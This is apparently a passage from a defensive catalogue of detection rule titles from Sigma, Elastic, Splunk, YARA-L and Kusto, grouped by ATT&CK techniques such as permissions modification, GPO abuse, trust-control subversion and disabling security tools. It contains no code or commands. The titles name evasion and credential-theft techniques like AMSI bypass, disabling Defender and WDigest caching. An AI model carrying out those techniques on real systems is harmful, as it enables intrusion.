- Sigma NET NGenAssemblyUsageLog Registry Key Tamper test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Elastic Netsh Helper DLL production
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New BgInfo.EXE Custom DB Path Registry Configuration test
- Sigma New BgInfo.EXE Custom VBScript Registry Configuration test
- Sigma New BgInfo.EXE Custom WMI Query Registry Configuration test
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Non-privileged Usage of Reg or Powershell test
- Elastic NullSessionPipe Registry Modification production
- Sigma OceanLotus Registry Activity test
- Sigma Office Macros Warning Disabled test
- Elastic Office Test Registry Persistence production
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled - Registry test
- Elastic Outlook Home Page Registry Modification production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Port Forwarding Rule Addition production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Sigma Potential NetWire RAT Activity - Registry test
- Sigma Potential Persistence Via Custom Protocol Handler test
- Sigma Potential Persistence Via Event Viewer Events.asp test
- Elastic Potential Persistence via Mandatory User Profile production
- Sigma Potential Persistence Via Outlook Home Page test
- Sigma Potential Persistence Via Outlook Today Page test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Qakbot Registry Activity test
- Sigma Potential Raspberry Robin Registry Set Internet Settings ZoneMap test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Suspicious Registry File Imported Via Reg.EXE test
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- YARA-L Potential Tampering With RDP Related Registry Keys Via Reg.EXE
- Sigma Potential Ursnif Malware Activity - Registry test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Sigma RDP Sensitive Settings Changed test
- YARA-L RDP Sensitive Settings Changed
- Sigma RDP Sensitive Settings Changed to Zero test
- YARA-L RDP Sensitive Settings Changed to Zero
- Sigma RedMimicry Winnti Playbook Registry Manipulation test
- Sigma Reg Add Suspicious Paths test
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Splunk Regini.exe Execution (Sysmon)
- Splunk Regini.exe Execution (Windows Event Log)
- Sigma Registry Entries For Azorult Malware test
- Splunk Registry Entry Created - PowerShell (PowerShell)
- Sigma Registry Explorer Policy Modification test
- Sigma Registry Hide Function from User test
- Splunk Registry key added with reg.exe (Sysmon)
- Splunk Registry key added with reg.exe (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Registry Modification Via Regini.EXE test
- Elastic Registry Persistence via AppInit DLL production
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Splunk Remcos client registry install entry production
- Sigma Removal of Potential COM Hijacking Registry Keys test
- Sigma RestrictedAdminMode Registry Value Tampering test
- YARA-L RestrictedAdminMode Registry Value Tampering
- Sigma RestrictedAdminMode Registry Value Tampering - ProcCreation test
- Splunk Revil Registry Entry production
- Sigma Run Once Task Configuration in Registry test
- Sigma Run Once Task Execution as Configured in Registry test
- Splunk Rundll32 Shimcache Flush production
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Service Binary in Suspicious Folder test
- Sigma Service Binary in User Controlled Folder test
- Elastic Service Disabled via Registry Modification production
- Elastic Service Path Modification production
- Sigma ShimCache Flush stable
- YARA-L ShimCache Flush
- Elastic SolarWinds Process Disabling Services via Registry production
- Elastic Startup or Run Key Registry Modification production
- Elastic Suspicious ImagePath Service Creation production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Splunk Suspicious Reg exe Process production
- Sigma Suspicious Registry Modification From ADS Via Regini.EXE test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBoxDrvInst.exe Parameters test
- Sigma Sysmon Channel Reference Deletion test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Sigma Trust Access Disable For VBApplications test
- Sigma Uncommon Microsoft Office Trusted Location Added test
- Elastic Uncommon Registry Persistence Change production
- Elastic Unusual Persistence via Services Registry production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma Wdigest CredGuard Registry Modification test
- Sigma Wdigest Enable UseLogonCredential test
- YARA-L Wdigest Enable UseLogonCredential
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Anomalous Registry Value Length in Environment Key production
- Splunk Windows Defender ASR Registry Modification production
- Splunk Windows Defender ASR Rule Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Splunk Windows Deleted Registry By A Non Critical Process File Path production
- Splunk Windows Disable Change Password Through Registry production
- Splunk Windows Disable Lock Workstation Feature Through Registry production
- Splunk Windows Disable LogOff Button Through Registry production
- Splunk Windows Disable Notification Center production
- Splunk Windows Disable Shutdown Button Through Registry production
- Splunk Windows Disable Windows Group Policy Features Through Registry production
- Splunk Windows Downdate Registry Activity production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows Hide Notification Features Through Registry production
- Splunk Windows Impair Defenses Disable AV AutoStart via Registry production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows Modify Registry AuthenticationLevelOverride production
- Splunk Windows Modify Registry Auto Minor Updates production
- Splunk Windows Modify Registry Auto Update Notif production
- Splunk Windows Modify Registry Configure BitLocker production
- Splunk Windows Modify Registry Default Icon Setting production
- Splunk Windows Modify Registry Delete Firewall Rules production
- Splunk Windows Modify Registry Disable RDP production
- Splunk Windows Modify Registry Disable Restricted Admin production
- Splunk Windows Modify Registry Disable Toast Notifications production
- Splunk Windows Modify Registry Disable Win Defender Raw Write Notif production
- Splunk Windows Modify Registry Disable WinDefender Notifications production
- Splunk Windows Modify Registry Disable Windows Security Center Notif production
- Splunk Windows Modify Registry DisableRemoteDesktopAntiAlias production
- Splunk Windows Modify Registry DisableSecuritySettings production
- Splunk Windows Modify Registry Disabling WER Settings production
- Splunk Windows Modify Registry DisAllow Windows App production
- Splunk Windows Modify Registry Do Not Connect To Win Update production
- Splunk Windows Modify Registry DontShowUI production
- Splunk Windows Modify Registry EnableLinkedConnections production
- Splunk Windows Modify Registry LongPathsEnabled production
- Splunk Windows Modify Registry MaxConnectionPerServer production
- Splunk Windows Modify Registry No Auto Reboot With Logon User production
- Splunk Windows Modify Registry No Auto Update production
- Splunk Windows Modify Registry NoChangingWallPaper production
- Splunk Windows Modify Registry on Smart Card Group Policy production
- Splunk Windows Modify Registry ProxyEnable production
- Splunk Windows Modify Registry ProxyServer production
- Splunk Windows Modify Registry Qakbot Binary Data Registry production
- Splunk Windows Modify Registry Regedit Silent Reg Import production
- Splunk Windows Modify Registry Suppress Win Defender Notif production
- Splunk Windows Modify Registry Tamper Protection production
- Splunk Windows Modify Registry to Add or Modify Firewall Rule production
- Splunk Windows Modify Registry UpdateServiceUrlAlternate production
- Splunk Windows Modify Registry USeWuServer production
- Splunk Windows Modify Registry Utilize ProgIDs production
- Splunk Windows Modify Registry ValleyRAT C2 Config production
- Splunk Windows Modify Registry ValleyRat PWN Reg Entry production
- Splunk Windows Modify Registry With MD5 Reg Key Name production
- Splunk Windows Modify Registry WuServer production
- Splunk Windows Modify Registry wuStatusServer production
- Splunk Windows Modify Show Compress Color And Info Tip Registry production
- Splunk Windows New InProcServer32 Added production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook WebView Registry Modification production
- Splunk Windows Routing and Remote Access Service Registry Key Change production
- Splunk Windows RunMRU Registry Key or Value Deleted production
- Splunk Windows Set Network Profile Category to Private via Registry production
- Splunk Windows Snake Malware Registry Modification wav OpenWithProgIds production
- Splunk Windows SnappyBee Create Test Registry production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Sigma Winlogon AllowMultipleTSSessions Enable test
Rogue Domain Controller T1207 7 rules
- Sigma Account accessed to attributes related to DCshadow experimental
- Sigma Add or Remove Computer from DC test
- Sigma Possible DC Shadow Attack test
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Controller Promotion production
- Splunk Windows AD Short Lived Domain Controller SPN Attribute production
- Splunk Windows AD Short Lived Server Object production
File and Directory Permissions Modification T1222 50 rules
- Sigma AD Object WriteDAC Access test
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Computer account modifying Active Directory permissions experimental
- Sigma Computer account modifying Active Directory permissions (PrivExchange) experimental
- Splunk Excessive Usage Of Cacls App production
- Elastic File and Directory Permissions Modification production
- Sigma File or Folder Permissions Modifications test
- Splunk File_Folder Hidden - Windows (PowerShell)
- Splunk File_Folder Hidden - Windows (Sysmon)
- Splunk File_Folder Hidden - Windows (Windows Event Log)
- Splunk Full Control Permissions Granted to Everyone - Windows (Sysmon)
- Splunk Full Control Permissions Granted to Everyone - Windows (Windows Event Log)
- Splunk Hiding Files And Directories With Attrib exe production
- Splunk Icacls Deny Command production
- Splunk ICACLS Grant Command production
- Splunk Modify ACL permission To Files Or Folder production
- Sigma OCSP responder security settings changed experimental
- Splunk Permission Modification using Takeown App production
- Splunk Permissions Replaced by icacls - Windows (PowerShell)
- Splunk Permissions Replaced by icacls - Windows (Sysmon)
- Splunk Permissions Replaced by icacls - Windows (Windows Event Log)
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Sigma PowerShell Script Change Permission Via Set-Acl - PsScript test
- Sigma PowerShell Set-Acl On Windows Folder - PsScript test
- Splunk Read-Only Attribute Removed - Windows (PowerShell)
- Splunk Read-Only Attribute Removed - Windows (Sysmon)
- Splunk Read-Only Attribute Removed - Windows (Windows Event Log)
- Sigma Replication privileges granted to perform DCSync attack experimental
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Recursive Takeown test
- Elastic System File Ownership Change production
- Sigma WannaCry Ransomware Activity test
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows File and Directory Enable ReadOnly Permissions production
- Splunk Windows File and Directory Permissions Enable Inheritance production
- Splunk Windows File and Directory Permissions Remove Inheritance production
- Splunk Windows Files and Dirs Access Rights Modification Via Icacls production
- Splunk Windows SubInAcl Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
- Splunk Windows Symlink Evaluation Change via Fsutil production
- Elastic WRITEDAC Access on Active Directory Object production
File and Directory Permissions Modification: Windows Permissions T1222.001 41 rules
- Sigma AD Object WriteDAC Access test
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Computer account modifying Active Directory permissions experimental
- Sigma Computer account modifying Active Directory permissions (PrivExchange) experimental
- Elastic File and Directory Permissions Modification production
- Sigma File or Folder Permissions Modifications test
- Splunk File_Folder Hidden - Windows (PowerShell)
- Splunk File_Folder Hidden - Windows (Sysmon)
- Splunk File_Folder Hidden - Windows (Windows Event Log)
- Splunk Full Control Permissions Granted to Everyone - Windows (Sysmon)
- Splunk Full Control Permissions Granted to Everyone - Windows (Windows Event Log)
- Splunk Hiding Files And Directories With Attrib exe production
- Splunk Permissions Replaced by icacls - Windows (PowerShell)
- Splunk Permissions Replaced by icacls - Windows (Sysmon)
- Splunk Permissions Replaced by icacls - Windows (Windows Event Log)
- Sigma Potentially Suspicious NTFS Symlink Behavior Modification test
- Splunk Read-Only Attribute Removed - Windows (PowerShell)
- Splunk Read-Only Attribute Removed - Windows (Sysmon)
- Splunk Read-Only Attribute Removed - Windows (Windows Event Log)
- Sigma Replication privileges granted to perform DCSync attack experimental
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Recursive Takeown test
- Elastic System File Ownership Change production
- Sigma WannaCry Ransomware Activity test
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows File and Directory Enable ReadOnly Permissions production
- Splunk Windows File and Directory Permissions Enable Inheritance production
- Splunk Windows File and Directory Permissions Remove Inheritance production
- Splunk Windows Files and Dirs Access Rights Modification Via Icacls production
- Splunk Windows SubInAcl Execution production
- Splunk Windows Symlink Evaluation Change via Fsutil production
- Elastic WRITEDAC Access on Active Directory Object production
Domain or Tenant Policy Modification T1484 33 rules
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Replication ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Self DACL Assignment production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Domain or Tenant Policy Modification: Group Policy Modification T1484.001 20 rules
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Subvert Trust Controls T1553 38 rules
- Sigma Active Directory Certificate Services Denied Certificate Enrollment Request test
- Splunk Certutil Root Certificate Install (Windows Event Log)
- Sigma Certutil root certificate installation experimental
- Elastic Code Signing Policy Modification Through Built-in tools production
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Creation or Modification of Root Certificate production
- Elastic Expired or Revoked Driver Loaded production
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Configuration Persistence test
- Sigma New Root Certificate Installed Via CertMgr.EXE test
- Sigma New Root Certificate Installed Via Certutil.EXE test
- Sigma Persistence Via New SIP Provider test
- Sigma Potential BOINC Software Execution (UC-Berkeley Signature) test
- Elastic Potential Masquerading as System32 Executable production
- Sigma Potential Secure Deletion with SDelete test
- Sigma Renamed BOINC Client Execution test
- Sigma Root Certificate Installed - PowerShell test
- Sigma Root Certificate Installed From Susp Locations test
- Elastic SIP Provider Modification production
- Sigma Suspicious Invoke-Item From Mount-DiskImage test
- Sigma Suspicious Mount-DiskImage test
- Sigma Suspicious RazerInstaller Explorer Subprocess test
- Sigma Suspicious SIP or trust provider registration experimental
- Sigma Suspicious Unblock-File test
- Sigma Suspicious X509Enrollment - Process Creation test
- Sigma Suspicious X509Enrollment - Ps Script test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows Mark Of The Web Bypass production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Registry Certificate Added production
- Splunk Windows Registry SIP Provider Modification production
- Splunk Windows SIP WinVerifyTrust Failed Trust Validation production
Subvert Trust Controls: Code Signing T1553.002 3 rules
- Elastic Expired or Revoked Driver Loaded production
- Elastic Potential Masquerading as System32 Executable production
- Sigma Potential Secure Deletion with SDelete test
Subvert Trust Controls: SIP and Trust Provider Hijacking T1553.003 6 rules
- Sigma Kapeka Backdoor Configuration Persistence test
- Sigma Persistence Via New SIP Provider test
- Elastic SIP Provider Modification production
- Sigma Suspicious SIP or trust provider registration experimental
- Splunk Windows Registry SIP Provider Modification production
- Splunk Windows SIP WinVerifyTrust Failed Trust Validation production
Subvert Trust Controls: Install Root Certificate T1553.004 11 rules
- Sigma Active Directory Certificate Services Denied Certificate Enrollment Request test
- Splunk Certutil Root Certificate Install (Windows Event Log)
- Sigma Certutil root certificate installation experimental
- Elastic Creation or Modification of Root Certificate production
- Sigma New Root Certificate Installed Via CertMgr.EXE test
- Sigma New Root Certificate Installed Via Certutil.EXE test
- Sigma Root Certificate Installed - PowerShell test
- Sigma Root Certificate Installed From Susp Locations test
- Sigma Suspicious X509Enrollment - Process Creation test
- Sigma Suspicious X509Enrollment - Ps Script test
- Splunk Windows Registry Certificate Added production
Subvert Trust Controls: Mark-of-the-Web Bypass T1553.005 13 rules
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Suspicious Invoke-Item From Mount-DiskImage test
- Sigma Suspicious Mount-DiskImage test
- Sigma Suspicious Unblock-File test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows Mark Of The Web Bypass production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
Subvert Trust Controls: Code Signing Policy Modification T1553.006 2 rules
- Elastic Code Signing Policy Modification Through Built-in tools production
- Elastic Code Signing Policy Modification Through Registry production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Network Boundary Bridging T1599 1 rule
- Sigma WinDivert Driver Load test
Network Boundary Bridging: Network Address Translation Traversal T1599.001 1 rule
- Sigma WinDivert Driver Load test
Disable or Modify Tools T1685 274 rules
- Splunk Add or Set Windows Defender Exclusion production
- Sigma Add SafeBoot Keys Via Reg Utility test
- Sigma AMSI Bypass Pattern Assembly GetType test
- Sigma AMSI Disabled via Registry Modification experimental
- Sigma Antivirus Filter Driver Disallowed On Dev Drive - Registry test
- Sigma Audit Policy Tampering Via Auditpol test
- Sigma Audit Policy Tampering Via NT Resource Kit Auditpol test
- Sigma Change Winevt Channel Access Permission Via Registry test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Diamond Sleet APT Scheduled Task Creation - Registry test
- Splunk Disable AMSI Through Registry production
- Splunk Disable Defender AntiVirus Registry production
- Splunk Disable Defender BlockAtFirstSeen Feature production
- Splunk Disable Defender Enhanced Notification production
- Splunk Disable Defender MpEngine Registry production
- Splunk Disable Defender Spynet Reporting production
- Splunk Disable Defender Submit Samples Consent Feature production
- Splunk Disable ETW Through Registry production
- Sigma Disable Exploit Guard Network Protection on Windows Defender test
- Splunk Disable Logs Using WevtUtil production
- Sigma Disable of ETW Trace - Powershell test
- Sigma Disable Privacy Settings Experience in Registry test
- Sigma Disable PUA Protection on Windows Defender test
- Splunk Disable Registry Tool production
- Splunk Disable Schedule Task production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Show Hidden Files production
- Sigma Disable Tamper Protection on Windows Defender test
- Splunk Disable Windows App Hotkeys production
- Splunk Disable Windows Behavior Monitoring production
- Sigma Disable Windows Defender AV Security Monitoring test
- Sigma Disable Windows Defender Functionalities Via Registry Keys test
- Sigma Disable Windows Event Logging Via Registry test
- Sigma Disable Windows IIS HTTP Logging test
- Splunk Disable Windows SmartScreen Protection production
- Sigma Disable-WindowsOptionalFeature Command PowerShell test
- Sigma Disabled IE Security Features test
- Sigma Disabled Volume Snapshots test
- Sigma Disabled Windows Defender Eventlog test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Splunk Disabling Defender Services production
- Splunk Disabling Firewall with Netsh production
- Splunk Disabling FolderOptions Windows Feature production
- Splunk Disabling NoRun Windows App production
- Splunk Disabling Task Manager production
- Sigma Disabling Windows Defender WMI Autologger Session via Reg.exe experimental
- Sigma Dism Remove Online Package test
- Sigma Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback test
- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Sigma ETW Logging Tamper In .NET Processes Via CommandLine test
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Splunk ETW Registry Disabled production
- Sigma ETW Trace Evasion Activity test
- Sigma Eventlog Cleared test
- Sigma EVTX Created In Uncommon Location test
- Splunk Excessive number of service control start as disabled production
- Splunk Excessive Usage Of Taskkill production
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Folder Removed From Exploit Guard ProtectedFolders List - Registry test
- Sigma Forest Blizzard APT - File Creation Activity test
- Sigma Forest Blizzard APT - JavaScript Constrained File Creation test
- Sigma HackTool - CobaltStrike BOF Injection Pattern test
- Sigma Hacktool - EDR-Freeze Execution experimental
- Sigma HackTool - EDRSilencer Execution test
- Sigma HackTool - EDRSilencer Execution - Filter Added test
- Sigma HackTool - PowerTool Execution test
- Sigma HackTool - SharpEvtMute DLL Load test
- Sigma HackTool - SharpEvtMute Execution test
- Sigma HackTool - Stracciatella Execution test
- Sigma HackTool - SysmonEnte Execution test
- Sigma Hide Schedule Task Via Index Value Tamper test
- Splunk Hide User Account From Sign-In Screen production
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma Hypervisor Enforced Paging Translation Disabled test
- Sigma Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine experimental
- Sigma Important Windows Event Auditing Disabled test
- Sigma Important Windows Eventlog Cleared test
- Sigma Load Of RstrtMgr.DLL By A Suspicious Process test
- Sigma Load Of RstrtMgr.DLL By An Uncommon Process test
- Sigma Microsoft Defender Tamper Protection Trigger stable
- Sigma Microsoft Malware Protection Engine Crash test
- Sigma Microsoft Malware Protection Engine Crash - WER test
- Sigma Microsoft Office Protected View Disabled test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Sigma New Module Module Added To IIS Server test
- Sigma NotPetya Ransomware Activity test
- Sigma Obfuscated PowerShell OneLiner Execution test
- Sigma Potential AMSI Bypass Script Using NULL Bits test
- Sigma Potential AMSI Bypass Using NULL Bits test
- Sigma Potential AMSI Bypass Via .NET Reflection test
- Sigma Potential AMSI COM Server Hijacking test
- Sigma Potential AutoLogger Sessions Tampering test
- Sigma Potential EventLog File Location Tampering test
- Sigma Potential Ke3chang/TidePool Malware Activity test
- Sigma Potential Privileged System Service Operation - SeLoadDriverPrivilege test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential Tampering With Security Products Via WMIC test
- Sigma Potential Windows Defender Tampering Via Wmic.EXE test
- Sigma Powershell Base64 Encoded MpPreference Cmdlet test
- Sigma Powershell Defender Disable Scan Feature test
- Sigma Powershell Defender Exclusion test
- Sigma PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' experimental
- Splunk Powershell Disable Security Monitoring production
- Splunk Powershell Remove Windows Defender Directory production
- Splunk Powershell Windows Defender Exclusion Commands production
- Sigma PPL Tampering Via WerFaultSecure experimental
- Sigma Previously Installed IIS Module Was Removed test
- Splunk Process Kill Base On File Path production
- Sigma PUA - CleanWipe Execution test
- Sigma Python Function Execution Security Warning Disabled In Excel test
- Sigma Python Function Execution Security Warning Disabled In Excel - Registry test
- Sigma Raccine Uninstall test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma Reg Add Suspicious Paths test
- Sigma Removal Of AMSI Provider Registry Keys test
- Sigma Removal Of Index Value to Hide Schedule Task - Registry test
- Sigma Removal Of SD Value to Hide Schedule Task - Registry test
- Sigma SafeBoot Registry Key Deleted Via Reg.EXE test
- Sigma Scripted Diagnostics Turn Off Check Enabled - Registry test
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Security Eventlog Cleared test
- Sigma Security Service Disabled Via Reg.EXE test
- Sigma Service Registry Key Deleted Via Reg.EXE test
- Sigma Service Startup Type Change Via Wmic.EXE experimental
- Sigma Service StartupType Change Via PowerShell Set-Service test
- Sigma Service StartupType Change Via Sc.EXE test
- Sigma Suspicious Application Allowed Through Exploit Guard test
- Sigma Suspicious Eventlog Clear test
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Sigma Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location experimental
- Sigma Suspicious Path In Keyboard Layout IME File Registry Value test
- Sigma Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze experimental
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious PROCEXP152.sys File Created In TMP test
- Sigma Suspicious Service Installed test
- Sigma Suspicious Svchost Process Access test
- Sigma Suspicious Uninstall of Windows Defender Feature via PowerShell experimental
- Splunk Suspicious wevtutil Usage production
- Sigma Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE test
- Sigma Suspicious Windows Defender Registry Key Tampering Via Reg.EXE test
- Sigma Suspicious Windows Service Tampering test
- Sigma Suspicious Windows Trace ETW Session Tamper Via Logman.EXE test
- Sigma Sysinternals PsSuspend Suspicious Execution test
- Sigma Sysmon Application Crashed test
- Sigma Sysmon Configuration Update test
- Sigma Sysmon Driver Altitude Change test
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Sigma Tamper Windows Defender - PSClassic test
